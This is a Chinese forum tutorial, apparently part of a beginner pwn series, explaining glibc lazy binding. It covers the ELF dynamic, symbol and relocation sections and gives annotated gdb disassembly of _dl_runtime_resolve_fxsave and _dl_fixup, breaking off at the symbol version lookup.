首页
社区
课程
招聘
[原创]PWN入门-11-制服_dl_resolve_runtime
发表于: 2024-9-12 22:37 1473

[原创]PWN入门-11-制服_dl_resolve_runtime

2024-9-12 22:37
1473

_dl_runtime_resolve初探

当程序使用动态链接库中的函数时,由于链接器无法确定动态链接函数的地址信息,所以会将动态链接函数的绑定过程拖到运行期再进行操作,这一过程被称作是动态链接。

动态链接分成启动期链接和调用期链接两种,启动期链接指的是动态链接器LD运行时就将全部的动态链接函数地址解析好,调用期链接指的是动态链接函数首次调用时再进行解析,调用期链接的做法也被称作是延迟绑定。

在启动过程中,lazy变量是会决定是否在启动时对动态链接函数的地址进行解析,该变量的数值是根据.dynamic动态链接节中是否存在BIND_NOW标志进行设置的。

1
0x000000000000001e (FLAGS)              BIND_NOW

当程序不需要延迟绑定时,elf_machine_runtime_setup函数内部根据lazy变量的提示不会做任何的操作,紧接着会直接通过ELF_DYNAMIC_DO_XXX函数解析全部的动态链接函数。

当程序需要延迟绑定时,elf_machine_runtime_setup函数修改.plt节中首表项内的信息为解析函数的信息,使得首次调用时程序可以根据解析函数完成动态链接函数的解析操作,而ELF_DYNAMIC_DO_XXX函数则不会进行任何操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void
_dl_relocate_object (struct link_map *l, struct r_scope_elem *scope[],
             int reloc_mode, int consider_profiling)
{
    ......
    ELF_DYNAMIC_RELOCATE (l, scope, lazy, consider_profiling, skip_ifunc);
    ......
}
 
# define ELF_DYNAMIC_RELOCATE(map, scope, lazy, consider_profile, skip_ifunc) \
  do {                                        \
    int edr_lazy = elf_machine_runtime_setup ((map), (scope), (lazy),         \
                          (consider_profile));        \
    if (((map) != &GL(dl_rtld_map) || DO_RTLD_BOOTSTRAP))             \
      ELF_DYNAMIC_DO_RELR (map);                          \
    ELF_DYNAMIC_DO_REL ((map), (scope), edr_lazy, skip_ifunc);            \
    ELF_DYNAMIC_DO_RELA ((map), (scope), edr_lazy, skip_ifunc);           \
  } while (0)

下面展示了调用期链接具体使用的解析函数。

1
2
3
4
5
6
0x0000000000401134 <+14>:    call   0x401030 <puts@plt>
 
(gdb) x /3i 0x401030
   0x401030 <puts@plt>: jmp    *0x2fca(%rip)        # 0x404000 <puts@got.plt>
   0x401036 <puts@plt+6>:       push   $0x0
   0x40103b <puts@plt+11>:      jmp    0x401020

从上面可以看到程序会根据0x404000中的地址信息决定调用的函数是什么,当解析函数完成解析工作后,0x404000中的地址一定会被修改为动态链接函数的所在地址,因此我们可以在0x404000地址上设置监测点,查看解析函数的真身是谁。

当监测点发现地址上的数据发生变动后,就会自动中断下来,通过查看调用栈可以知道_dl_runtime_resolve_fxsave负责解析动态链接函数。

1
2
3
4
5
6
7
(gdb) bt
#0  0x00007ffff7fd7184 in _dl_fixup (l=0x7ffff7ffe2e0, reloc_arg=<optimized out>) at dl-runtime.c:163
#1  0x00007ffff7fd9557 in _dl_runtime_resolve_fxsave () at ../sysdeps/x86_64/dl-trampoline.h:98
#2  0x0000000000401139 in main () at main.c:5
#3  0x00007ffff7dd0e08 in ?? () from /usr/lib/libc.so.6
#4  0x00007ffff7dd0ecc in __libc_start_main () from /usr/lib/libc.so.6
#5  0x0000000000401065 in _start ()

_dl_runtime_resolve_fxsave函数的顺利工作,依赖ELF中动态链接节和重定位节信息,下面会先对这些相关的节进行分析。

ELF文件是如何支持动态链接的?

动态链接节

.dynamic动态链接节是极为重要的,因为它里面存放着程序进行动态链接的全部所需信息,所以程序只需要一个.dynamic节,就可以检索到所有的相关信息。

.dynamic节可以看作是一张表,表中有各种各样的表项,表项信息通过Elf64_Dyn结构体进行描述。

/usr/include/elf.h头文件中,可以找到Elf64_Dyn结构体的定义,d_tag成员用于标明表项对应的动态链接属性,d_un成员表示属性对应的具体数值。

1
2
3
4
5
6
7
8
9
typedef struct
{
  Elf64_Sxword  d_tag;          /* Dynamic entry type */
  union
    {
      Elf64_Xword d_val;        /* Integer value */
      Elf64_Addr d_ptr;         /* Address value */
    } d_un;
} Elf64_Dyn;

d_tag的有非常多的种类,下面只列出了部分,完整的列表和解释可以在/usr/include/elf.h头文件中找到。

1
2
3
4
5
#define DT_NULL     0
#define DT_NEEDED   1
......
#define DT_EXTRATAGIDX(tag) ((Elf32_Word)-((Elf32_Sword) (tag) <<1>>1)-1)
#define DT_EXTRANUM 3

当动态链接属性是DT_FLAGSDT_FLAGS_1时,d_val成员的数值会是DF_xxxDF_1_xxx的中的某一个。

比如前面提到的BIND_NOW标志就是通过DT_FLAGSDT_FLAGS_1进行描述的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
readelf工具解析出来的友好信息:
0x000000000000001e (FLAGS)              BIND_NOW
0x000000006ffffffb (FLAGS_1)            Flags: NOW
 
16进制信息:
403f18 1e000000 00000000 08000000 00000000  ................
403f28 fbffff6f 00000000 01000000 00000000  ...o............
 
elf文件中的定义信息:
#define DT_FLAGS    30
#define DT_FLAGS_1  0x6ffffffb
 
#define DF_BIND_NOW 0x00000008
#define DF_1_NOW    0x00000001

动态链接节的手工查找实战

通过readelf工具的-d选项可以轻松的将动态链接节中的信息解析出来,这是非常方便且利于人类阅读的信息,它这里做了两大操作,一是找到.dynamic节的位置,而是将.dynamic节中的二进制信息解析成人类可读的信息。

接下来会演示如何手动找到.dynamic节的位置。

1
2
3
4
5
Dynamic section at offset 0x2df8 contains 24 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 ......
 0x0000000000000000 (NULL)               0x0

第一步查看ELF头信息,获得节头表的位置0x3720、节头表中表项大小0x40以及节头表中表项数量0x24。

1
2
3
4
00000000  7f 45 4c 46 02 01 01 00  00 00 00 00 00 00 00 00  |.ELF............|
00000010  02 00 3e 00 01 00 00 00  40 10 40 00 00 00 00 00  |..>.....@.@.....|
00000020  40 00 00 00 00 00 00 00  20 37 00 00 00 00 00 00  |@....... 7......|
00000030  00 00 00 00 40 00 38 00  0d 00 40 00 24 00 23 00  |....@.8...@.$.#.|

找到节头表的位置后,可以非常轻松的将.dynamic节找出来(此处是21号表项),并根据节头表中表项的定义,将.dynamic节头的信息解析出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
节头表定义:
typedef struct
{
  Elf64_Word    sh_name;        /* Section name (string tbl index) */
  Elf64_Word    sh_type;        /* Section type */
  Elf64_Xword   sh_flags;       /* Section flags */
  Elf64_Addr    sh_addr;        /* Section virtual addr at execution */
  Elf64_Off sh_offset;      /* Section file offset */
  Elf64_Xword   sh_size;        /* Section size in bytes */
  Elf64_Word    sh_link;        /* Link to another section */
  Elf64_Word    sh_info;        /* Additional section information */
  Elf64_Xword   sh_addralign;       /* Section alignment */
  Elf64_Xword   sh_entsize;     /* Entry size if section holds table */
} Elf64_Shdr;
 
节头表中的21号表项对应的16进制信息:
00003c60  eb 00 00 00 06 00 00 00  03 00 00 00 00 00 00 00  |................|
00003c70  f8 3d 40 00 00 00 00 00  f8 2d 00 00 00 00 00 00  |.=@......-......|
00003c80  d0 01 00 00 00 00 00 00  07 00 00 00 00 00 00 00  |................|
00003c90  08 00 00 00 00 00 00 00  10 00 00 00 00 00 00 00  |................|
 
16进制信息解析:
sh_name:
    0x35b3+0xeb0x35b3是字符串节的起始地址,0xeb是节名的索引值
    0000369e  2e 64 79 6e 61 6d 69 63  00 2e 67 6f 74 00 2e 67  |.dynamic..got..g
sh_type:
    #define SHT_DYNAMIC   6
sh_flags:
    #define SHF_WRITE        (1 << 0) /* Writable */
    #define SHF_ALLOC        (1 << 1)
    0x3 = b11 -> WA
sh_addr:0x3df8,sh_offset:0x2df8,sh_size:0x01d0
sh_link:0x7,sh_info:0x0,sh_addralign:0x8,sh_entsize:0x10
 
readelf中的动态链接节头信息(与手工解析结果一致):
[21] .dynamic          DYNAMIC          0000000000403df8  00002df8
       00000000000001d0  0000000000000010  WA       7     0     8

查看.dynamic节中内容,可以发现结果和上方readelf工具的-d选项的解析内容一致。

1
2
3
4
5
00002df8  01 00 00 00 00 00 00 00  18 00 00 00 00 00 00 00  |................|
00002e08  0c 00 00 00 00 00 00 00  00 10 40 00 00 00 00 00  |..........@.....|
......
00002f58  f0 ff ff 6f 00 00 00 00  ee 04 40 00 00 00 00 00  |...o......@.....|
00002f68  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

动态链接符号节与动态链接字符串节

程序使用的函数和全局变量往往被称作是符号,.symtab节中会存储着全部的符号信息,而.dynsym节则会专门存储与动态链接相关的符号信息,.dynsym节与.symtab节共用同一个结构描述信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
typedef struct
{
  Elf64_Word    st_name;        /* Symbol name (string tbl index) */
  unsigned char st_info;        /* Symbol type and binding */
  unsigned char st_other;       /* Symbol visibility */
  Elf64_Section st_shndx;       /* Section index */
  Elf64_Addr    st_value;       /* Symbol value */
  Elf64_Xword   st_size;        /* Symbol size */
} Elf64_Sym;
 
Symbol table '.dynsym' contains 6 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _[...]@GLIBC_2.34 (2)
     2: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterT[...]
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
     5: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMC[...]

.dynstr节是专门为st_name成员设立的,作为索引值辅助.dynsym节匹配符号名。

1
2
3
4
5
6
[ 7] .dynstr           STRTAB           0000000000400470  00000470
       000000000000007e  0000000000000000   A       0     0     1
 
00000470  00 70 75 74 73 00 5f 5f  6c 69 62 63 5f 73 74 61  |.puts.__libc_sta|
......
000004e0  72 54 4d 43 6c 6f 6e 65  54 61 62 6c 65 00 00 00  |rTMCloneTable...|

哈希节

GLibC通过.gnu.hash节加快符号的查找过程,关于.gnu.hash节是如何进行工作的问题,这里暂时不会进行解析。

1
2
3
4
5
[ 5] .gnu.hash         GNU_HASH         00000000004003c0  000003c0
       000000000000001c  0000000000000000   A       6     0     8
 
000003c0  01 00 00 00 01 00 00 00  01 00 00 00 00 00 00 00  |................|
000003d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

重定位节

在ELF文件中,重定位节分成.rela.dyn.rela.plt两类,它们的区别在于重定位时修正地址的位置不同,其中.rela.dyn修正的信息位于.got节,.rela.plt节修正的信息位于.got.plt节。

至于.got节和.got.plt节,它们的区别在于完成重定位工作后,是否会被GNU_RELRO段设置为只读状态。

1
2
3
4
5
6
7
8
9
10
Relocation section '.rela.dyn' at offset 0x530 contains 4 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000403fc8  000100000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
000000403fd0  000200000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_deregisterTM[...] + 0
000000403fd8  000400000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000403fe0  000500000006 R_X86_64_GLOB_DAT 0000000000000000 _ITM_registerTMCl[...] + 0
 
Relocation section '.rela.plt' at offset 0x590 contains 1 entry:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000404000  000300000007 R_X86_64_JUMP_SLOT 0000000000000000 puts@GLIBC_2.2.5 + 0

重定位节的作用可以从下面结构体的定义中略窥一二,其中r_offset成员指示出了需要修改的重定位信息位置,r_info成员则指示出了重定位类型和符号索引值,这里的索引值用于在.dynsym节内检索符号,r_addend成员显示的将加数指了出来(Elf64_Rel中使用隐式加数),r_addendr_offset共同指明了待修改的重定位信息位置。

1
2
3
4
5
6
7
8
9
10
11
12
typedef struct
{
  Elf64_Addr    r_offset;       /* Address */
  Elf64_Xword   r_info;         /* Relocation type and symbol index */
} Elf64_Rel;
 
typedef struct
{
  Elf64_Addr    r_offset;       /* Address */
  Elf64_Xword   r_info;         /* Relocation type and symbol index */
  Elf64_Sxword  r_addend;       /* Addend */
} Elf64_Rela;

重定位是如何工作的

在上面我们介绍了与动态链接相关的各种节信息,但是目前我们只是知道它们会辅助动态链接函数调用的顺利进行,但是还并不知道它们之间是如何协同工作的,下面就会对此进行解析。

进入解析函数

首次调用动态链接函数时,PLT中首条指令jmp会带我们前往第二条指令pushpush会将符号在.rela.plt中的索引值压入栈内,最后一条jmp指令会带我们前往.plt节中的首表项。

1
2
3
4
5
6
7
8
9
10
(gdb)
0x0000000000401030 in puts@plt ()
1: x/i $rip
=> 0x401030 <puts@plt>: jmp    *0x2fca(%rip)        # 0x404000 <puts@got.plt>
(gdb) x /gx 0x404000
0x404000 <puts@got.plt>:        0x0000000000401036
(gdb) si
0x0000000000401036 in puts@plt ()
1: x/i $rip
=> 0x401036 <puts@plt+6>:       push   $0x0

.plt节中的首表项中存储着_dl_runtime_resolve_fxsave函数的地址,该函数进行重定位操作的关键函数。

push指令会将当前link_map信息所在地址压入栈内。

0x403ff0中保存的link_map信息地址和0x403ff8中保存的_dl_runtime_resolve_fxsave函数地址位于.got节,并由LD在启动时修改。

1
2
3
4
5
6
7
8
9
(gdb) x /gx 0x403ff8
0x403ff8:       0x00007ffff7fd9510
(gdb) info symbol 0x00007ffff7fd9510
_dl_runtime_resolve_fxsave in section .text of /lib64/ld-linux-x86-64.so.2
 
0000000000401020 <puts@plt-0x10>:
  401020:       ff 35 ca 2f 00 00       push   0x2fca(%rip)        # 403ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
  401026:       ff 25 cc 2f 00 00       jmp    *0x2fcc(%rip)        # 403ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
  40102c:       0f 1f 40 00             nopl   0x0(%rax)

解析函数的操作

_dl_runtime_resolve_fxsave函数的反汇编如下所示,同时下方也写明了对汇编代码的解释。

从汇编代码中可以看到,函数由序言、获取动态链接函数、结语、调用动态链接函数四大部分组成。

首先看到的是序言部分,它的主要作用是分配栈空间。

在之前的PLT中,两个push指令先后向栈上压入了符号索引值以及link_map信息的地址,它们会提供给_dl_fixup函数使用,不将它们交给调用者寄存器传递,是因为调用者寄存器已经被用于放置动态链接函数的形参了。

这里会先将旧的rsp保存到rbx内,以便_dl_fixup函数获取参数。

1
2
3
4
5
6
7
8
9
10
函数序言:
0x00007ffff7fd9510 <+0>:     endbr64
0x00007ffff7fd9514 <+4>:     push   %rbx
保存rbx寄存器数值,腾出rbx寄存器空间
0x00007ffff7fd9515 <+5>:     mov    %rsp,%rbx
保存rsp到rbx
0x00007ffff7fd9518 <+8>:     and    $0xfffffffffffffff0,%rsp
清零rsp中的低4个比特位,跟0x10对齐
0x00007ffff7fd951c <+12>:    sub    $0x240,%rsp
分配栈空间

动态链接函数最多接收六个参数作为形参,它们通过调用者寄存器进行保存,但由于接下来会使用_dl_fixup函数获取动态链接函数,该函数会使用新的形参,动态链接函数也需要在_dl_fixup函数运行后操作,所以这里会先将调用者寄存器中的参数保存到栈上,等到动态链接函数真被调用时再从栈上放出来。

这里还有一个特殊的寄存器rax,它并不在传递形参的寄存器范围之内,但它也是一个特殊的寄存器,会被用于存储返回值,同时也会被用于存储系统调用号。

保存好动态链接函数的参数后,就会从rbx中取出符号索引值以及link_map信息的地址,交给_dl_fixup函数,最后对_dl_fixup函数进行调用。

当函数返回之后,因为rax在后面会被使用,所以它会将返回值交给r11

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
0x00007ffff7fd9523 <+19>:    mov    %rax,(%rsp)
0x00007ffff7fd9527 <+23>:    mov    %rcx,0x8(%rsp)
0x00007ffff7fd952c <+28>:    mov    %rdx,0x10(%rsp)
0x00007ffff7fd9531 <+33>:    mov    %rsi,0x18(%rsp)
0x00007ffff7fd9536 <+38>:    mov    %rdi,0x20(%rsp)
0x00007ffff7fd953b <+43>:    mov    %r8,0x28(%rsp)
0x00007ffff7fd9540 <+48>:    mov    %r9,0x30(%rsp)
保存寄存器数值到栈上,腾出寄存器空间
0x00007ffff7fd9545 <+53>:    fxsave 0x40(%rsp) # mov (LOCAL_STORAGE_AREA + 8)(%BASE), %RSI_LP
保存上下文信息
0x00007ffff7fd954a <+58>:    mov    0x10(%rbx),%rsi
0x00007ffff7fd954e <+62>:    mov    0x8(%rbx),%rdi
准备形参给_dl_fixup
0x00007ffff7fd9552 <+66>:    call   0x7ffff7fd6ff0 <_dl_fixup>
调用_dl_fixup
0x00007ffff7fd9557 <+71>:    mov    %rax,%r11
保存返回值到r11

函数结语的作用是恢复栈空间和寄存器空间数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
函数结语:
0x00007ffff7fd955a <+74>:    fxrstor 0x40(%rsp)
恢复上下文信息
0x00007ffff7fd955f <+79>:    mov    0x30(%rsp),%r9
0x00007ffff7fd9564 <+84>:    mov    0x28(%rsp),%r8
0x00007ffff7fd9569 <+89>:    mov    0x20(%rsp),%rdi
0x00007ffff7fd956e <+94>:    mov    0x18(%rsp),%rsi
0x00007ffff7fd9573 <+99>:    mov    0x10(%rsp),%rdx
0x00007ffff7fd9578 <+104>:   mov    0x8(%rsp),%rcx
0x00007ffff7fd957d <+109>:   mov    (%rsp),%rax
0x00007ffff7fd9581 <+113>:   mov    %rbx,%rsp
0x00007ffff7fd9584 <+116>:   mov    (%rsp),%rbx
恢复之前保存的寄存器数值,让后续的使用者使用的数值仍是正确的
0x00007ffff7fd9588 <+120>:   add    $0x18,%rsp

恢复好栈空间和寄存器数据后,动态链接函数有了正确被调用的基础,最后就是通过r11中保存的动态链接函数地址进行跳转,实现动态链接函数的调用。

1
2
3
调用动态链接函数:
0x00007ffff7fd958c <+124>:   jmp    *%r11
跳转到r11寄存器保存的地址

从上面分析的反汇编结果中可以看到,_dl_runtime_resolve_fxsave函数的主要操作就是调用_dl_fixup函数,然后根据_dl_fixup函数的返回值进行跳转,那么接下来就让我们将视线转移到_dl_fixup函数的内部。

重定位信息修正

进入到_dl_fixup函数后,就会开始修正重定位信息。

函数序言

函数内部首先出现的就是函数序言,其主要作用在于分配栈空间。

其中rbxr12r13r14r15位于被调用者寄存器范围内,它们的数值放入栈内,寄存器空间留给其他被调用者使用。

rdi中存储的是link_map的地址,这里会在rbx内再保存一份。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0x00007ffff7fd6ff0 <+0>:     endbr64
0x00007ffff7fd6ff4 <+4>:     push   %rbp
保存调用者栈底指针
0x00007ffff7fd6ff5 <+5>:     xor    %r9d,%r9d
0x00007ffff7fd6ff8 <+8>:     mov    %rsp,%rbp
设置当前函数的栈底指针
0x00007ffff7fd6ffb <+11>:    push   %r15
0x00007ffff7fd6ffd <+13>:    push   %r14
0x00007ffff7fd6fff <+15>:    push   %r13
0x00007ffff7fd7001 <+17>:    push   %r12
0x00007ffff7fd7003 <+19>:    push   %rbx
腾出寄存器空间
0x00007ffff7fd7004 <+20>:    mov    %rdi,%rbx
0x00007ffff7fd7007 <+23>:    sub    $0x18,%rsp
分配栈空间

动态链接符号节获取

完成设置栈空间的操作后,首先会准备参数,其中r8寄存器中存储着.dynsym的地址,不过它是怎么取到的呢?

1
2
3
4
5
6
7
0x00007ffff7fd700b <+27>:    mov    0x70(%rdi),%rax
根据形参传递的地址,取出偏移0x70处的数据给rax
0x00007ffff7fd700f <+31>:    mov    (%rdi),%rdx
将rdi保存地址上的数值传给rdx
0x00007ffff7fd7012 <+34>:    mov    0x8(%rax),%r8
0x00007ffff7fd7016 <+38>:    testb  $0x20,0x356(%rdi)
0x00007ffff7fd701d <+45>:    je     0x7ffff7fd7025 <_dl_fixup+53>

程序及动态链接库所需的链接信息由link_map结构体进行管理,在该结构体内存在着一个名为l_info的成员,该成员的作用是动态链接信息(根据.dynamic节获取),我们知道.dynamic节是一张表,每个表项都会占据一段空间,l_info中存储的就是表项的内存地址信息。

l_info成员位于偏移0x40处,大小为0x280,此处偏移0x70是为了寻找SYMTAB表项(.dynsym节)。

检索到SYMTAB表项的地址后,然后根据表项的定义,偏移0x8处就是.dynsym节的地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
.dynamic节:
 ......
 0x0000000000000006 (SYMTAB)             0x4003e0
 ......
.dynsym节:
[ 6] .dynsym           DYNSYM           00000000004003e0  000003e0
       0000000000000090  0000000000000018   A       7     1     8
 
rax:
(gdb) info registers rdi
rdi            0x7ffff7ffe2e0      140737354130144
(gdb) x /gx 0x7ffff7ffe2e0+0x70
0x7ffff7ffe350: 0x0000000000403e88
(gdb) x /gx 0x403e88
0x403e88:       0x0000000000000006
r8:
(gdb) x /gx 0x403e88+0x8
0x403e90:       0x00000000004003e0

参与比较运算的数值分别是0x20和rdi+0x356地址上存储的数据,这里GLibC中使用了一个特别的用法,就是在变量名后添加:和数字,作用是指定变量占用的比特位,其中rdi+0x356对应着link_map中的l_audit_any_pltl_find_object_processed成员,0x20就是用于判断l_find_object_processed成员的值是否为1。

1
2
3
4
5
6
unsigned int l_audit_any_plt:1;
unsigned int l_removed:1;
unsigned int l_contiguous:1;
unsigned int l_free_initfini:1;
unsigned int l_ld_readonly:1;
unsigned int l_find_object_processed:1;

test指令和je指令是较为常见的比较运算指令,其中的也逻辑并不复杂,test指令在进行完与运行后,会根据运算结果设置eflags标志位寄存器中的ZF标志位(Zero Flag),je指令会根据ZF标志位决定是否跳转(ZF为1时跳转),下面展示了test指令运行前后的eflags寄存器信息。

1
2
3
4
5
6
运行前:
(gdb) info registers eflags
eflags         0x10202             [ IF RF ]
运行后:
(gdb) info registers eflags
eflags         0x10246             [ PF ZF IF RF ]

这里如果判断l_find_object_processed为1,就代表lt_library不需要处理,反之则进行处理,一般情况下都是不需要进行处理的。

rdx存储着link_map结构体中存储的基地址l_addr成员,之前mov (%rdi),%rdx操作将l_addr赋给rdx

1
2
0x00007ffff7fd701f <+47>:    add    %rdx,%r8
0x00007ffff7fd7022 <+50>:    mov    %rdx,%r9

动态链接字符串节获取

获得.dynsym节的真实地址后,就会再获取.dynstr节的真实地址,r9经过函数序言内的xor %r9d,%r9d后已经被置零,不管l_find_object_processed将是不是修正值交给了r9,程序使用r9进行加法运行产生的结果始终是正确的。

1
2
3
4
5
0x00007ffff7fd7025 <+53>:    mov    0x68(%rbx),%rax
......
0x00007ffff7fd7030 <+64>:    mov    0x8(%rax),%rdi
....
0x00007ffff7fd703f <+79>:    add    %r9,%rdi

STRTAB表项位于l_info成员的0x68位置,这里取出STRTAB表项后,会将表项中存放的.dynstr节的地址放入rdi内。

1
2
3
4
5
6
7
8
9
10
11
12
13
偏移0x68的元素为.dynmaic节中.dynstr节:
(gdb) x /gx $rbx
0x7ffff7ffe2e0: 0x0000000000000000
(gdb) x /gx $rbx+0x68
0x7ffff7ffe348: 0x0000000000403e78
(gdb) x /gx 0x403e78+0x8
0x403e80:       0x0000000000400470
 
.dynamic节中存储的.dynstr节信息:
 0x0000000000000005 (STRTAB)             0x400470
.dynstr节信息:
   [ 7] .dynstr           STRTAB           0000000000400470  00000470
       000000000000007e  0000000000000000   A       0     0     1

重定位信息获取

获取完.dynstr节后,会接着按照上面的套路获取.rela.plt节信息。

rsi寄存器中存放的是_dl_runtime_resolve_fxsave函数寄过来的符号索引值,符号索引值值会先后通过lea指令扩张24倍。

l_info偏移0xf8处是JMPREL表项,该表项对应着.rela.plt节,偏移0x8可以获取.rela.plt节的地址,因为.rela.plt节也可以被看作是一张表,每个表项通过Elf64_Rela结构体描述,所以想要使用符号索引值检索重定位符号信息,就相当于索引值乘Elf64_Rela结构体大小。

不难知道Elf64_Rela结构体大小是24,此时就解开了lea指令将符号索引值扩张24倍的原因。

1
2
3
Elf64_Rela结构体大小:
(gdb) p sizeof(Elf64_Rela)
$11 = 24

.rela.plt节的基地址加上索引偏移数值后,就可以得到指定重定位信息的地址,该地址位于r13寄存器内。

1
2
3
4
5
6
0x00007ffff7fd7029 <+57>:    mov    %esi,%r12d
0x00007ffff7fd702c <+60>:    lea    (%r12,%r12,2),%rcx
0x00007ffff7fd7034 <+68>:    mov    0xf8(%rbx),%rax
0x00007ffff7fd703b <+75>:    mov    0x8(%rax),%rax
0x00007ffff7fd7042 <+82>:    lea    (%rax,%rcx,8),%r13
0x00007ffff7fd7046 <+86>:    add    %r9,%r13

动态链接符号获取

找到重定位信息中,可以在偏移0x0处找到r_offset成员,偏移0x8处找到r_info成员。

1
2
3
4
0x00007ffff7fd7049 <+89>:    mov    0x8(%r13),%rsi
0x00007ffff7fd704d <+93>:    mov    0x0(%r13),%r14
0x00007ffff7fd7051 <+97>:    mov    %rsi,%rax
0x00007ffff7fd7054 <+100>:   add    %rdx,%r14

r_info表述的数值分成符号索引值和重定位类型两部分,高位是符号索引值,低位是重定位类型,shr指令右移32位取出符号索引值给rax,随后会利用lea指令将符号索引值乘24倍,24是Elf64_Sym结构体的大小。

1
2
(gdb) p sizeof(Elf64_Sym)
$12 = 24

r8中存储的是.dynsym节基地址,基地址加符号索引值乘符号表大小,就可以获取动态链接符号的信息了。

接下来cmp指令会将r_info的低位字节与0x7进行比较,定位方式ELF_MACHINE_JMP_SLOT对应的数值就是0x7,jne指令如果发现运行结果不是0(ZF为0),那么就会跳转到偏移0x663的位置,执行退出动作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
0x00007ffff7fd7057 <+103>:   shr    $0x20,%rax
0x00007ffff7fd705b <+107>:   lea    (%rax,%rax,1),%rcx
0x00007ffff7fd705f <+111>:   add    %rcx,%rax
0x00007ffff7fd7062 <+114>:   lea    (%r8,%rax,8),%rax
0x00007ffff7fd7066 <+118>:   mov    %rax,-0x40(%rbp)
0x00007ffff7fd706a <+122>:   cmp    $0x7,%esi
0x00007ffff7fd706d <+125>:   jne    0x7ffff7fd7287 <_dl_fixup+663>
 
r8+24=0x400428
下面通过Elf64_Sym结构体对该地址上的数据进行解释:
(gdb) p *(Elf64_Sym*)(0x400428)
$16 = {st_name = 1, st_info = 18 '\022', st_other = 0 '\000', st_shndx = 0,
  st_value = 0, st_size = 0}
 
st_name索引值刚好可以和下方0x400471对应(0x400470 + 1
rdi对应.dynstr节:
(gdb) x /s $rdi
0x400470:       ""
(gdb)
0x400471:       "puts"
 
st_info数值对应二进制格式为:0001 0010
#define STB_GLOBAL  1;#define STT_FUNC  2
4个比特位数值为1,对应STB_GLOBAL,低4字节为2,对应STT_FUNC
上面分析的结果与readelf工具解析的结果一致:
3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND puts@GLIBC_2.2.5 (3)

确认符号已经导出

得到待重定位的符号信息后,会从符号信息中取出st_other成员(偏移0x5,st_name占4字节,st_info占1字节),然后st_other成员将与0x3进行比较,判断符号是否被导致,如果符号是导出的,那么就需要执行查找操作。

1
2
3
4
5
6
7
0x3进行比较的来源:
#define STV_PROTECTED   3
#define ELF32_ST_VISIBILITY(o)  ((o) & 0x03)
#define ELF64_ST_VISIBILITY(o)  ELF32_ST_VISIBILITY (o)
 
0x00007ffff7fd7073 <+131>:   testb  $0x3,0x5(%rax)
0x00007ffff7fd7077 <+135>:   jne    0x7ffff7fd7260 <_dl_fixup+624>

如果符号是未导出的,那么它对我们来讲就是已知的,就会直接跳转到偏移0x624处,不会执行查找操作。

版本信息判断

执行符号查找操作时,会先从l_info成员中偏移0x208处取出VERSYM表项,如果发现符号信息为空就会跳转到0x199处,不对符号信息进行处理,反之则会进行处理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
0x00007ffff7fd707d <+141>:   mov    0x208(%rbx),%rdx
0x00007ffff7fd7084 <+148>:   xor    %r8d,%r8d
0x00007ffff7fd7087 <+151>:   test   %rdx,%rdx
0x00007ffff7fd708a <+154>:   je     0x7ffff7fd70b7 <_dl_fixup+199>
 
0x00007ffff7fd708c <+156>:   add    %r9,%rcx
0x00007ffff7fd708f <+159>:   add    0x8(%rdx),%rcx
0x00007ffff7fd7093 <+163>:   movzwl (%rcx),%edx
0x00007ffff7fd7096 <+166>:   and    $0x7fff,%edx
0x00007ffff7fd709c <+172>:   lea    (%rdx,%rdx,2),%rcx
0x00007ffff7fd70a0 <+176>:   mov    0x320(%rbx),%rdx
0x00007ffff7fd70a7 <+183>:   lea    (%rdx,%rcx,8),%r8
0x00007ffff7fd70ab <+187>:   mov    0x8(%r8),%r10d
0x00007ffff7fd70af <+191>:   test   %r10d,%r10d
0x00007ffff7fd70b2 <+194>:   jne    0x7ffff7fd70b7 <_dl_fixup+199>
0x00007ffff7fd70b4 <+196>:   xor    %r8d,%r8d

当程序不进行跳转时,就会根据VERSYM表项地址偏移0x8找到.gnu.version节的地址。

1
2
3
4
5
6
7
8
9
10
11
VERSYM对应的.gnu.version节结构体定义:
typedef struct
{
  Elf64_Half    vd_version;     /* Version revision */
  Elf64_Half    vd_flags;       /* Version information */
  Elf64_Half    vd_ndx;         /* Version Index */
  Elf64_Half    vd_cnt;         /* Number of associated aux entries */
  Elf64_Word    vd_hash;        /* Version name hash value */
  Elf64_Word    vd_aux;         /* Offset in bytes to verdaux array */
  Elf64_Word    vd_next;        /* Offset in bytes to next verdef entry */
} Elf64_Verdef;

然后再偏移6字节(前面lea (%rax,%rax,1),%rcx,先扩大了3倍)得到vd_cnt成员给edx,最后与0x7fff进行与运算,可以发现该数值就是重定位符号的版本信息索引值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
获取的版本信息:
(gdb) info registers rdx
rdx            0x3                 3
 
.gnu.version中记录的版本信息:
